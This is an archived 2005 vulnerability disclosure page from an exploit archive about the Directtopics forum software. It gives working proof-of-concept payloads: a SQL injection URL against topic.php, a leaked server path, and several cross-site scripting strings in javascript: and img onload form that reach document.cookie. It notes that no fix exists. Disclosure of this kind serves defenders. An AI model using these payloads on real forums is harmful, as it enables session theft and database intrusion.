exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

dt_Multiple_vuln.txt

dt_Multiple_vuln.txt
Posted Aug 7, 2005
Authored by Morinex

Directtopics versions 2 beta, DT2 final, 2.1, and 2.2 suffer from SQL injection and cross site scripting flaws, amongst others.

tags | exploit, xss, sql injection
SHA-256 | d60828b5244945543468dc2d85e89126d782dbf69960aa3e1012e6c0ec32390c

dt_Multiple_vuln.txt

Change Mirror Download
------------------------------------------------------------------------
# Directtopics Multiple Vulnerabilities
# By : Morinex
# e-mail : morinex@marocmafia.com
# date : 08-04-2k5
# shoutz : w00pie.nl


>Target : Directtopics
>Vulnerable Versions: DT 2 beta , DT2 final, 2.1, and 2.2
>URL : www.directtopics.nl - http://forum.directtopics.nl/

Tested

Localhost , Directtopics.nl and some forums from Google.


- Description

Direct Topics has been designed an entire self free forum software
of system what become uses can for each type website.
You can let discuss give your visitors with each other particular
subjects or your visitors a chance what comment over your site behind to let.
Naturally you can turn the forum also without website, perhaps
nicely an own football forum on to set or a forum over webdesign.



--------------------------------------------------------------------------------
PoC SQL injection :

http://example.com/topic.php?topic=669%B4SQL%20INJECTION


Warning: mysql_num_rows(): supplied argument is not a valid MySQL result


PoC Full path disclosure :


/home/dis000414/domains/directtopics.nl/public_html/forum/topic.php on line 162


PoC cross-site scripting :
Open a thread and post this :
" javascript:alert(document.cookie) "

PoC MD5 hash disclosure
Open a thread and post this :
"
[img]javascript:alert(document.cookie)[/img] <img src=javascript:alert(document.cookie)>
[img]# onload=alert(document.cookie)[/img] <img src=# onload=alert(document.cookie)>




*Solution* :

There isn´t atm.
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close